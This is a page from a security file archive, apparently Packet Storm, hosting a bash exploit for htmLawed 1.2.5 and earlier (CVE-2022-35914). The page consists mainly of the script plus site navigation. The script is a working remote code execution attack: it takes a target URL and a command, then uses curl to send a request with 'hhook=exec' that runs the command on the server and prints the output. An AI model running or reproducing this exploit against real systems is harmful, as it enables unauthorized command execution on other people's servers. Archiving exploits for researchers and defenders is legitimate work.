Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
Change Mirror[12] Download[13]
#!/bin/bash
# Exploit Title: htmlLawed <= 1.2.5 - Remote Code Execution
# Date: 2024-05-02
# Exploit Author: Miguel Redondo (aka d4t4s3c)
# Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed
# Software Link: https://github.com/kesar/HTMLawed
# Version: <= 1.2.5
# Tested on: Linux
# Category: Web Application
# CVE: CVE-2022-35914
while getopts ":u:c:" arg; do
case ${arg} in
u) url=${OPTARG}; let parameter_counter+=1 ;;
c) cmd=${OPTARG}; let parameter_counter+=1 ;;
esac
done
if [ -z "${url}" ] || [ -z "${cmd}" ]; then
echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution"
echo -e "\n[-] Usage: CVE-2022-35914.sh -u <url> -c <cmd>\n"
exit 1
else
echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution"
echo -e "\n[+] Executing Command: ${cmd}\n"
cmd_output=$(curl -s -d "sid=foo&hhook=exec&text=${cmd}" -b "sid=foo" ${url} | egrep '\ \[[0-9]+\] =\>' | sed -E 's/\ \[[0-9]+\] =\> (.*)<br \/>/\1/')
echo -e "${cmd_output}\n"
exit 0
fi
File Tags
- ActiveX[19] (933)
- Advisory[20] (85,077)
- Arbitrary[21] (16,680)
- BBS[22] (2,859)
- Bypass[23] (1,834)
- CGI[24] (1,032)
- Code Execution[25] (7,642)
- Conference[26] (689)
- Cracker[27] (844)
- CSRF[28] (3,373)
- DoS[29] (24,645)
- Encryption[30] (2,383)
- Exploit[31] (52,859)
- File Inclusion[32] (4,253)
- File Upload[33] (987)
- Firewall[34] (822)
- Info Disclosure[35] (2,855)
- Intrusion Detection[36] (907)
- Java[37] (3,128)
- JavaScript[38] (890)
- Kernel[39] (7,040)
- Local[40] (14,718)
- Magazine[41] (586)
- Overflow[42] (13,081)
- Perl[43] (1,431)
- PHP[44] (5,201)
- Proof of Concept[45] (2,371)
- Protocol[46] (3,703)
- Python[47] (1,604)
- Remote[48] (31,448)
- Root[49] (3,618)
- Rootkit[50] (523)
- Ruby[51] (619)
- Scanner[52] (1,650)
- Security Tool[53] (7,983)
- Shell[54] (3,258)
- Shellcode[55] (1,217)
- Sniffer[56] (900)
- Spoof[57] (2,261)
- SQL Injection[58] (16,541)
- TCP[59] (2,425)
- Trojan[60] (689)
- UDP[61] (899)
- Virus[62] (669)
- Vulnerability[63] (32,651)
- Web[64] (9,885)
- Whitepaper[65] (3,775)
- x86[66] (967)
- XSS[67] (18,183)
- Other[68]
File Archives
- May 2024[69]
- April 2024[70]
- March 2024[71]
- February 2024[72]
- January 2024[73]
- December 2023[74]
- November 2023[75]
- October 2023[76]
- September 2023[77]
- August 2023[78]
- July 2023[79]
- June 2023[80]
- Older[81]
Systems
- AIX[82] (429)
- Apple[83] (2,078)
- BSD[84] (376)
- CentOS[85] (58)
- Cisco[86] (1,927)
- Debian[87] (7,025)
- Fedora[88] (1,693)
- FreeBSD[89] (1,246)
- Gentoo[90] (4,467)
- HPUX[91] (880)
- iOS[92] (373)
- iPhone[93] (108)
- IRIX[94] (220)
- Juniper[95] (69)
- Linux[96] (49,477)
- Mac OS X[97] (691)
- Mandriva[98] (3,105)
- NetBSD[99] (256)
- OpenBSD[100] (488)
- RedHat[101] (15,700)
- Slackware[102] (941)
- Solaris[103] (1,611)
- SUSE[104] (1,444)
- Ubuntu[105] (9,478)
- UNIX[106] (9,394)
- UnixWare[107] (187)
- Windows[108] (6,653)
- Other[109]
- Services
- Security Services[120]
- Hosting By
- Rokasec[121]